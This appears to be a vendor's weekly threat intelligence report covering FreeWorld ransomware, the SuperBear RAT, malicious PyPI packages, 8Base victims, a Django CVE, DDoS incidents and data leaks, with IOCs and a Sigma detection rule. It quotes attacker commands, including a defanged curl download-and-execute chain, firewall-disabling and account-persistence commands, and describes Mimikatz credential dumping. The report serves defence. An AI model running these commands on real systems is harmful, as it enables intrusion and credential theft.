Self Assessment

Weekly Intelligence Report – 08 Sep 2023

Published On : 2023-09-07
Share :
Weekly Intelligence Report – 08 Sep 2023

Ransomware of the Week

CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. This includes multiple – industries, geography, and technology – which could be relevant to your organization.

Type: Ransomware.
Target Technologies: MS Windows.

Introduction
CYFIRMA Research and Advisory Team has found ransomware known as FreeWorld while monitoring various underground forums as part of our Threat Discovery Process.

FreeWorld:
FreeWorld is a recently emerged Mimic Ransomware variant.
The Ransomware once executed will encrypt files and append their filenames with a “.FreeWorldEncryption”. Once this process is concluded, a ransom note “FreeWorld- Contact.txt” – will be created.

Screenshot of files encrypted by FreeWorld ransomware. (Source: Surface Web)

FreeWorld ransomware note. (Source: Surface Web)

Breakdown of Ransomware attack in recent campaign.

Initial Access
In a recent attack campaign, hackers employed brute-force attacks to infiltrate MSSQL servers. After gaining authentication, they promptly initiated the process of listing or identifying information within the database, with a particular focus on seeking out other login credentials.

Execution
Subsequently, upon realizing that the MSSQL function xp_cmdshell stored procedure was activated, the assailants initiated the execution of shell commands on the host. Typically, this function should remain disabled unless it is necessary.

Discovery
The enumeration process involved the utilization of a few fundamental commands, primarily wmic.exe, net.exe, and ipconfig.exe. Each of these commands was executed via the MSSQL xp_cmdshell.

Defense Evasion
After confirming the target system’s legitimacy, the attackers proceeded to impair its defences by executing various commands. These actions involved creating three new users (Windows, adminv$, and mediaadmin$) and adding them to “remote desktop users” and “administrators” groups. The attackers employed a multi-language command to increase their chances of success, allowing them to adapt to different system languages. This approach provided a streamlined method for their malicious activities.

The attackers took an aggressive approach by disabling the Windows Firewall entirely using the command “netsh firewall set opmode disable.” This action bypassed the need to manage or check the firewall state. With many of the system’s defences, especially network protection and RDP authentication, now disabled, the attackers focused on establishing persistence. They began connecting to a remote SMB share for transferring tools. Initially, they detached various network shares, though their specific motivations remain unclear, as this action could disrupt running processes and alert administrators.

Persistence
The attackers will execute commands for each of the mentioned users. Once the users and groups are established, they will run the following commands to prevent password expiration and ensure the users were never logged off:

  • net accounts /maxpwage:unlimited
  • net accounts /forcelogoff:no

Command and Control
It became evident that the attackers preferred using RDP to connect to the victim’s machine. Later, they were observed using Ngrok proxy software. However, before proceeding, the attackers conducted an enumeration to assess the current state of the RDP environment.

Network share analysis
The network share provided the attacker with the capability to transfer files to and from the victim system and install malicious tools. Researchers observed that although many files had obscure and random names, their intended functions became evident through their usage patterns.

During this phase, researchers detected a shift in the attackers’ strategies. They moved away from executing commands via the xp_cmdshell method and began utilizing commands from an SMB-delivered binary known as svr.exe. This binary appeared to serve as a command and control payload for Cobalt Strike. The researchers observed the binary establishing DNS connections with gelsd[.]com.

Ngrok usage
The attackers tried to establish RDP persistence using Ngrok, a tool that can bypass firewalls by running a host service and providing a public IP and port for the attacker to connect to. They placed the Ngrok binary in C:\Windows\System32, renaming it to n.exe. An unsuccessful attempt was made to create a connection using the svr.exe command.

AnyDesk used as a RAT
The attackers, undeterred by previous setbacks, turned to the use of AnyDesk, a legitimate remote access software often abused by threat actors as a Remote Access Trojan (RAT) to deploy ransomware. They executed a batch file named “a2.bat” through the svr.exe process to download and run the AnyDesk installation. However, the batch file seemed to be set to self-delete, making it impossible to observe its contents.

Having established a strong level of persistence, the attackers shifted their focus to lateral movement within the network. They downloaded an advanced port scanner utility, placing it in the desktop directory of the newly created user “windows”. In addition, they executed Mimikatz through a batch file called “start.bat”.This batch file first modified the registry to force clear text credentials, employing a WDigest downgrade attack by executing the command. Subsequently, the batch file executed Mimikatz to dump credentials. The results were stored on the “windows” user’s desktop.

Ransomware:
The attackers used a harmful software called “Mimic ransomware” to take control of a computer. FreeWorld is ransomware that is the variant of this Mimic. Both use a program called “Everything” to find and lock up important files on the computer.

First, they downloaded a file called “5000.exe” and put it on the computer’s desktop. Then, they ran it by clicking on it. This “5000.exe” program did some things behind the scenes. It took another program called “7zip” and “Everything” and put them in a temporary folder on the computer. Then, it told “7zip” to open a special locked file called “everything64.dll” using a secret password.

After that, they took the actual ransomware program and put it in a hidden folder on the computer. This ransomware program was called “dc.exe”. When they ran it, it started locking up the computer’s files and gave them a special name with “.FreeWorldEncryption” at the end.

Once it finished doing its bad work, it created a text file called “FreeWorld-Contact.txt” with instructions on how the victim could pay them to unlock their files.

Relevancy and Insights:

  • This ransomware specifically targets the widely used Windows Operating System, which is prevalent across numerous industries and organizations.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to evade detection and gain access to sensitive information.
  • USB Bus Checks: The ransomware is actively monitoring and checking the USB bus for connected devices. This behaviour suggests that the ransomware may be attempting to propagate itself by spreading through removable media, such as USB drives. It could be searching for specific files or vulnerabilities on connected devices to further spread its malicious payload.
  • User Input Checks: The ransomware is also performing checks on user input. This behaviour implies that the ransomware may have the ability to interact with the user or receive commands in some way. It could be looking for specific inputs or triggers to initiate its encryption process or carry out other malicious activities. This behaviour indicates a level of sophistication and interactivity in the ransomware’s design.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. Ransomware that can detect debug environments may have implemented techniques to evade or disable debugging tools.
  • Long sleep periods: The malware performs long sleep during execution, indicating that it may be designed to avoid detection or delay its actions on the compromised system.
  • Persistence: The ransomware exhibits persistence mechanisms to ensure its survival and ongoing malicious activities within the compromised environment. This could involve creating autostart entries or modifying system settings to maintain a foothold and facilitate future attacks.

ETLM assessment
CYFIRMA’s assessment, based on the information available, indicates that the FreeWorld ransomware could pose a serious threat to organizations that rely heavily on Microsoft SQL Server (MS SQL) for data storage. We will continue to monitor, and provide a more comprehensive assessment when further information becomes available.

Following are the TTPs based on MITRE Attack Framework.

Sr. No Tactics Techniques/Sub-Techniques
1 TA0001:Initial Access T1091: Replication Through Removable Media
2 TA0002:Execution T1059: Command and Scripting Interpreter
T1129: Shared Modules
3 TA0003: Persistence T1543.003: Create or Modify System Process: Windows Service
T1546.012: Event Triggered Execution: Image File Execution Options Injection
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.008: Boot or Logon Autostart Execution: LSASS Driver
4 TA0004: Privilege Escalation T1055: Process Injection
T1543.003: Create or Modify System Process: Windows Service
T1546.012: Event Triggered Execution: Image File Execution Options Injection
T1547.001: Boot or Logon Autostart Execution:
Registry Run Keys / Startup Folder
T1547.008: Boot or Logon Autostart Execution: LSASS Driver
5 TA0005: Defense Evasion T1027: Obfuscated Files or Information
T1027.002: Obfuscated Files or Information: Software Packing
T1036: Masquerading
T1055: Process Injection
T1070.004: Indicator Removal: File Deletion
T1222: File and Directory Permissions Modification
T1497: Virtualization/Sandbox Evasion
T1562.001: Impair Defenses: Disable or Modify
Tools
6 TA0006: Credential Access T1003: OS Credential Dumping
T1056.001: Input Capture: Keylogging
7 TA0007: Discovery T1012: Query Registry
T1033: System Owner/User Discovery
T1057: Process Discovery
T1082: System Information Discovery
T1083: File and Directory Discovery
T1120: Peripheral Device Discovery
T1497: Virtualization/Sandbox Evasion
T1518.001: Software Discovery: Security Software Discovery
T1614.001: System Location Discovery: System Language Discovery
8 TA0008:Lateral Movement T1091: Replication Through Removable Media
9 TA0009: Collection T1056.001: Input Capture: Keylogging
T1005: Data from Local System
T1185: Browser Session Hijacking
10 TA0010:Exfiltrati on T1567: Exfiltration Over Web Service
11 TA0011: Command and Control T1105: Ingress Tool Transfer
T1572: Protocol Tunneling
T1573.001: Encrypted Channel: Symmetric Cryptography
T1219: Remote Access Software
12 TA0040:Impact T1486: Data Encrypted for Impact

Indicators of Compromise
Kindly refer to the IOCs section to exercise controls on your security systems.

Sigma Rule:
title: UAC Bypass via ICMLuaUtil tags:
– attack.defense_evasion
– attack.privilege_escalation
– attack.t1548.002 logsource:
category: process_creation product: windows
detection: selection:
ParentImage|endswith: ‘\dllhost.exe’ ParentCommandLine|contains:
– ‘/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}’
– ‘/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}’
filter:
– Image|endswith: ‘\WerFault.exe’
– OriginalFileName: ‘WerFault.exe’ condition: selection and not filter
falsepositives:
– Unknown level: high
(Source: Surface Web)

STRATEGIC RECOMMENDATIONS

  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.

MANAGEMENT RECOMMENDATIONS

  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Update all applications/software regularly with the latest versions and security patches alike.
  • Add the Sigma rules for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.

Trending Malware of the Week

Type: Remote Access Trojan (RAT)
Objective: Data theft, Espionage, and Remote Access
Target Organization: Civil Society Groups
Suspected Threat Actor: Kimsuky (aka APT43)

Active Malware of the Week
This week “SuperBear” is trending.

SuperBear

Researchers have uncovered a new and unique remote access trojan (RAT) called SuperBear RAT that has been identified in a malware campaign and specifically targets journalists. This malware is deployed using open-source AutoIT scripts, posing a significant security concern for media professionals.

Researchers received a targeted sample sent to a journalist, containing a lure to open the document. The journalist received an email from an activist, thinking it was from an organization member, but it contained a malicious .LNK document. When opened, it executed a malicious PowerShell command along with a legitimate DOCX file related to the organization. Further analysis by researchers revealed that after the initial compromise, an AutoIT script was used to perform process injection through process hollowing.

Attack Method
Upon executing the .LNK file, a hidden PowerShell window was triggered alongside a legitimate document. The actor employed obfuscation techniques to load and execute a PowerShell command. This command decoded a value, resulting in a VBS script saved to the user profile directory. The VBS script contained commands with “su” additions to evade file-based detection signatures. The payload delivery site was a compromised WordPress instance of a legitimate website. Following the command retrieved two payloads from the domain.

  • cmd /c mkdir c:\dbhg & cd /d c:\dbhg & copy c:\windows\system32\curl.exe dbhg.exe & dbhg -o Autoit3.exe https[:]//REDACTED[.]me/wp-content/solmir.pdb & dbhg -o MTdYFp.au3 https[:]//REDACTED[.]me/wp-content/solmir_1.pdb & Autoit3.exe MTdYFp.au3

Payloads

  • AutoIT3 executable with filename “solmir.pdb” renamed to Autoit3.exe – this is an open-source technology.
  • A compiled and packed AutoIT3 script called with the filename “solmir_1.pdb” which is renamed to “MTdYFp.au3”

AutoIT3 was executed with the compiled script as a parameter, leading to a process injection operation.

AutoIT process injection using process hollowing
The AutoIT script used in this malware campaign employs a process hollowing technique, involving native Windows API calls. It begins by creating a suspended instance of Explorer.exe with “CreateProcess,” then unmapping the suspended process using “NtUnmapViewOfSection” before injecting malicious code. The process is then resumed through “VirtualAllocEx,” “WriteProcessMemory,” “SetThreadContext,” and “ResumeThread.” It establishes a connection with a C2 server at IP Address: 89[.]117[.]139[.]230 and Domain: hironchk[.]com. The RAT carries out one of three primary attack operations:

  • Exfiltrating process and system data.
  • Downloading and executing a shell command.
  • Downloading and running a DLL.

The default action for the C2 server instructs clients to exfiltrate system data. Additionally, the RAT can execute shell commands or download a malicious DLL onto the infected machine, with the DLL being named “SuperBear” if it can’t generate a random filename.

INSIGHTS

  • SuperBear RAT is a highly advanced and targeted threat that poses a significant risk to journalists. Its precision targeting, advanced techniques, and versatile capabilities highlight its formidable nature in the cybersecurity landscape. The default action of exfiltrating system data reflects thorough reconnaissance by the threat actors, underscoring the evolving sophistication of cyber threats, especially in their focused efforts on journalists.
  • SuperBear RAT employs a process hollowing technique, which is a sophisticated method to hide malicious activity within legitimate processes. This technique’s relevance lies in its ability to evade detection and analysis. Additionally, the RAT establishes a connection with a Command and Control (C2) server, which is significant for tracking and understanding the malware’s command structure.
  • Attribution for this campaign is tentatively linked to Kimsuky, based on similarities in the initial attack vector and code patterns observed across multiple campaigns. However, it’s important to highlight that there are no indications of infrastructure overlap with known Kimsuky clusters at this time. This unique attack vector represents a novel approach for Kimsuky, known for its previous use of open-source tools like Quasar RAT in their operations.

Indicators of Compromise
Kindly refer to the IOCs Section to exercise controls on your security systems.

STRATEGIC RECOMMENDATIONS

  • Incorporate Digital Risk Protection (DRP) as part of the overall security posture to proactively defend against impersonations and phishing attacks.
  • Upgrade to an email security solution that provides advanced phishing protection, business email compromise detection, internal email protection, and account compromise detection.
  • Deploy an Extended Detection and Response (XDR) solution as part of the organization’s layered security strategy that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.

MANAGEMENT RECOMMENDATIONS

  • Regularly reinforce awareness related to different cyberattacks using impersonated domains/spoofed webpages with end-users across the environment and emphasize the human weakness in mandatory information security training sessions.
  • Security Awareness training should be mandated for all company employees. The training should ensure that employees:
  • Avoid downloading and executing files from unverified sources. For example, be wary of Word and Excel documents sent from an unknown source or acquired from the Internet that prompts you to ‘Enable Macros’.
  • Always inspect the full URL before downloading files to ensure it matches the source (e.g., Microsoft Team should come from a Microsoft domain).
  • Inspect file extensions. Do not trust the filetype logo alone. An executable file can be disguised as a PDF or office document.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Implementation of a robust email security appliance for protection against phishing emails which can be scanned and blocked for malicious attachments and links as they are the topmost attack vector for Ransomware.
  • Consider the following multi-layered protection program:
    • Anti-evasion technology that prevents advanced evasion techniques that use embedded files and malicious URLs.
    • Anti-phishing engines to prevent any type of phishing attack before it reaches users.
    • Antivirus software for emails to minimize the risk of being infected by malware through email.

Weekly Intelligence Trends/Advisory

Weekly Attack Type and Trends

Key Intelligence Signals:

  • Attack Type: Malware Implants, Ransomware Attacks, Vulnerabilities & Exploits, DDoS, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gain.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption, Reputational Damage.
  • Ransomware –8Base Ransomware | Malware – SuperBear
  • 8Base Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – SuperBear
  • Behavior –Most of this malware uses phishing and social engineering techniques as its initial attack vector. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.

Threat Actor in Focus

Lazarus Group Behind Malicious Python Packages, Part of Supply Chain Attack

  • Threat Actors: Lazarus Group
  • Attack Type: Supply Chain
  • Objective: Unknown
  • Target Technology: Third-party software repository
  • Target Geographies: Unknown
  • Target Industries: Information Technology
  • Business Impact: Operational Disruption

Summary:
In a recent observation, the North Korean state-sponsored Advanced Persistent Threat group; Lazarus, was observed uploading malicious packages to the Python Package Index (PyPI) repository. Security researchers uncovered a malicious supply chain campaign. This campaign involved the upload of two dozen malicious Python packages onto the Python Package Index (PyPI) open-source repository. This campaign started in August, and the packages were removed from PyPI after accumulating downloads. The group disguised these packages as legitimate software, with one of them masquerading as a VMware vSphere connector module called vConnector. One of the malicious packages, named VMConnect, targeted IT professionals seeking virtualization tools and was downloaded 237 times. Two other packages, ‘ethter’ and ‘quantiumbase,’ were also found to contain the same code and were downloaded 253 and 216 times, respectively. Researchers found additional packages linked to the same operation, such as ‘tablediter’ (736 downloads), ‘request- plus’ (43 downloads), and ‘requestspro’ (341 downloads). These packages attempted to pass as legitimate software by appending “plus” and “pro” suffixes to their names. The malicious packages closely resembled the legitimate ones in terms of descriptions and file structures. However, they contained modifications that executed a malicious function, collecting data from infected machines and sending it to the attacker’s command and control servers. The attackers employed various techniques to avoid detection, such as typosquatting and impersonation of legitimate packages. One example is the tablediter package, which closely resembled the popular prettytable tool but executed its malicious code only when used in a project, rather than during installation.

Relevancy & Insights:
PyPI stands as the primary repository for Python packages, serving as a crucial resource for software developers seeking foundational components for their projects. Regrettably, its widespread usage renders it an appealing target for threat actors aiming to compromise developers or their undertakings. Frequently, these malicious packages are introduced under the umbrella of useful tools or emulate well-known projects by subtly altering their names. Given the immense volume of package uploads, PyPI lacks the capacity to thoroughly inspect each submission. Consequently, it relies on user reports to identify and eliminate malicious files. Unfortunately, by the time these files are removed, they have often accrued several hundred downloads.

ETLM Assessment:
This incident is not a lone case of malicious code infiltrating PyPI packages to execute harmful actions. It represents another instance in a series of supply chain attacks, where malicious PyPI packages have been employed for malicious purposes in the past. This latest occurrence underscores the strong probability of future software supply chain attacks, similar to the VMConnect campaign. Software supply chain attacks have gained popularity among both cybercriminals and state-sponsored threat actors due to their potential for widespread impact and their inherent difficulty in detection.

Recommendations:

  • Stay updated on threat intelligence related to software supply chain attacks and the tactics used by threat actors. This information can help you proactively defend against emerging threats.
  • Develop an incident response plan specifically tailored to supply chain attacks. Ensure that the organization is prepared to respond swiftly and effectively if a compromised package is identified.

Indicators of Compromise
Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

Major Geopolitical Developments in Cybersecurity

South African news site attack in conjunction with coverage of India during BRICS Summit
Daily Maverick; a South African news website, said that an Indian DDoS attack forced it to close the site off to the whole domain of India, in order to safeguard its operation. The alleged attack came a day after the portal had claimed that Indian Prime Minister Narendra Modi had delayed his arrival at Pretoria’s Waterkloof Air Force Base for the 2023 BRICS Summit until he would be greeted by Deputy President Paul Mashatile. The news outlet reported that Indian Prime Minister Narendra Modi would not get off the plane since South African President Cyril Ramaphosa would greet Chinese President Xi Jinping when he arrived for the summit, while no similar delegation was available to greet Modi. The news came paradoxically after Indian National security advisor Ajit Doval called for collective efforts to deal with challenges stemming from cyberspace at the Friends of BRICS meeting, a month prior.

Infamous Chisel malware used by Russian military intelligence as a combat support tool
The UK’s Ministry of Defence (MoD) has reviewed the recently exposed Infamous Chisel campaign against Ukrainian military targets. The MoD sees it as an instance of cyber operations, used as combat support. The National Cyber Security Centre (NCSC) has published a report on a malware campaign targeting Android mobile devices, used by the Ukrainian military, as reported on earlier by CYFIRMA. The malware, referred to as ‘Infamous Chisel’, has been used by the Russian cyber threat group known as Sandworm, previously linked to the Russian military intelligence agency’s (GRU) Main Centre for Special Technologies (GTsST). The malware enables persistent access to, and the collation and exfiltration of data and compromised Android devices. This includes targeting applications used by the Ukrainian military. Infamous Chisel has highly likely been used with the aim of stealing sensitive military information. This activity demonstrates Russia’s continued use of cyber capabilities to support the invasion of Ukraine.

Rise in Malware/Ransomware and Phishing Petkus Brothers is Impacted by 8Base Ransomware

Attack Type: Ransomware
Target Industry: Household Durables
Target Geography: The United States of America
Ransomware: 8Base Ransomware
Objective: Data Theft, Data Encryption, Financial Gains
Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary:
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in the dark forum that a company from the United States of America, (www[.]petkusbrothers[.]com), was compromised by 8Base Ransomware. Petkus Brothers is California’s Sunroom, Room Addition, and Remodelling Specialists. The compromised information includes invoices, receipts, accounting records, personal data certificates, employment agreements, and various other sensitive documents.

The following screenshot was observed published on the dark web:


Source: Dark Web

Relevancy & Insights:

  • The 8Base group’s identity, methods, and motivations largely remain a mystery. However, based on its leak site and public accounts, along with the group’s communications, researchers think the group’s verbal style is quite similar to that of RansomHouse; a group that typically purchases already compromised data or works with data leak sites to extort victims. This has led to speculation that 8Base may be an offshoot of RansomHouse.
  • 8Base uses a variety of ransomware strains, including a variant known as Phobos. The group has customized Phobos by appending ‘.8base’ to their encrypted files, but the format of the entire appended portion remains the same as Phobos, which includes an ID section, an email address, and then the file extension. This suggests that 8Base is leveraging Ransomware-as-a-Service (RaaS) offerings, a common practice among ransomware groups.
  • Based on 8base Ransomware victims list, the top 5 Target countries are as follows:

ETLM Assessment:

It is CYFIRMA’s assessment that while not a lot is known about 8Base, given the significant targeting of US companies as compared to other countries, globally in such a small timeframe, we assess their target geography will remain the same in the near future, which as per our assessment as a RaaS operating model is likely to provide the largest profit margins. We will continue to monitor and provide a more comprehensive assessment in due course. Remember that no single measure can guarantee complete protection, so it’s essential to adopt a layered security approach. Regularly reviewing and updating your security measures is crucial as the threat landscape evolves.

Vulnerabilities and Exploits Vulnerability in Django

  • Attack Type: Vulnerabilities & Exploits
  • Target Technology: Content Management System
  • Vulnerability:: CVE-2023-41164 (CVSS Base Score 7.5)
  • Vulnerability Type: Resource Exhaustion

Summary:
The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

Relevancy & Insight:
The vulnerability exists as the application does not properly control consumption of internal resources within the ‘django.utils.encoding.uri_to_iri()’ method.

Impact :
A remote attacker can pass a large number of characters to the affected method and perform a denial of service (DoS) attack. Affected Products: https[:]//www.djangoproject[.]com/weblog/2023/sep/04/security- releases/

Recommendations:

  • Patch and Update: Immediately apply the security patches provided by Django to address CVE-2023-41164. Regularly update your Django CMS and associated libraries to protect against known vulnerabilities.
  • Layered Security Approach: Adopt a multi-layered security approach to protect your content management system. This should include firewalls, intrusion detection systems, access controls, and regular security audits

Latest Cyber-Attacks, Incidents, and Breaches

German financial agency has been experiencing disruptions due to a DDoS attack
Threat Actors: unknown
Attack Type: DDoS
Objective: Operational Disruption
Target Technology: Web Application
Target Geographies: Germany
Target Industries: Banking and Finance
Business Impact: Operational Disruption

Summary:
The German Federal Financial Supervisory Authority (BaFin) disclosed that its website
has been under an ongoing distributed denial-of-service (DDoS) attack since last Friday. BaFin, as Germany’s financial regulatory body, operates under the Federal Ministry of Finance and holds the responsibility of overseeing 2,700 banks, 800 financial institutions, and 700 insurance service providers. The regulatory authority is recognized for its law enforcement functions both within Germany and on the global stage. Over the past few years, it has levied fines of $10 million against Deutsche Bank and $5 million against Bank of America for a range of infractions. The German agency announced that it has implemented all necessary security measures and defensive actions to protect its operations against cyberattacks. The perpetrators of the DDoS attack on the German financial authority remain unidentified, but there is speculation that pro-Russian hacktivists may be involved due to Germany’s supportive stance towards Ukraine, which includes providing financial and military equipment assistance.

Relevancy & Insights:

  • The ongoing distributed denial-of-service (DDoS) attack on BaFin’s website highlights the growing cybersecurity threats faced by financial regulatory bodies. Such attacks can disrupt essential services and impact the dissemination of crucial information to the public.
  • The DDoS attack on BaFin’s website highlights the vulnerability of financial regulatory authorities to cyber threats, the importance of cybersecurity measures, and the potential geopolitical motivations behind such attacks. It also emphasizes the critical role played by BaFin in maintaining the integrity of Germany’s financial sector and the need for transparency and public access to regulatory information.

ETLM Assessment:
Given Germany’s continued support for the war in Ukraine and continued military aid, we assess further DDoS attacks or similar targeting of other Federal German institutions. The DDoS attack on The German Federal Financial Supervisory Authority (BaFin) is a reflection of the motivations of the suspected threat actors to disrupt and embarrass major institutions associated to Governments that support the Ukrainian war effort.

Data Leaks

myBillBook’s Data Advertised in Leak Site

Attack Type: Data Leaks
Target Industry: Software
Target Geography: India
Target Technology: SQL Database
Objective: Data Theft, Financial Gains
Business Impact: Data Loss, Reputational Damage

Summary:
CYFIRMA Research team observed a potential data leak related to myBillBook, {www[.]niobook[.]com}. myBillBook GST billing software helps businesses create professional invoices in just a few clicks. The compromised data consists of the public user’s ID, email, password, first name, last name, mobile number, and additional confidential information in SQL format, with a combined data size of 4 gigabytes.

Source: Underground forums

Relevancy & Insights:

  • Cybercriminals driven by the pursuit of financial gains are constantly searching for exposed and susceptible systems and software. The majority of these malicious actors conduct their activities in hidden online communities, where they discuss relevant matters and trade stolen digital assets. In contrast to other financially motivated groups such as ransomware or extortion syndicates, who often publicize their exploits, these perpetrators prefer to remain discreet. They secure unauthorized access and filch valuable information by capitalizing on unpatched software or exploiting vulnerabilities within systems or applications. The ill-gotten data is subsequently promoted for sale within clandestine online spaces, and it may be further sold and repurposed by fellow attackers in their own campaigns.

    Other Observations

  • CYFIRMA Research team observed a potential data leak related to WPDeveloper,
    {www[.]wpdeveloper[.]com}. WPDeveloper is a dedicated Product delivery and maintenance Company for WordPress. The company is headquartered in the United States of America. The compromised data includes ID, email, hashed password, website URL, name, and other sensitive information.

    Source: Underground forums

    STRATEGIC RECOMMENDATIONS

    • Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
    • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
    • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
    • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next generation security solutions and ready to go incident response plan.
    • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.

    MANAGEMENT RECOMMENDATIONS

    • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
    • Proactively monitor the effectiveness of risk-based information security strategy, the security controls applied and the proper implementation of security technologies, followed by corrective actions remediations, and lessons learned.
    • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromised, and, are measured against real attacks the organization receives.
    • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
    • Detection processes are tested to ensure awareness of anomalous events. Timely communication of anomalies and continuously evolved to keep up with refined ransomware threats.

    TACTICAL RECOMMENDATIONS

    • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
    • Consider using security automation to speed up threat detection, improved incident response, increased the visibility of security metrics, and rapid execution of security checklists.
    • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthen defences based on tactical intelligence provided
    • Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
    • Implement a combination of security control such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout to thwart automated brute-force attacks.
    • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.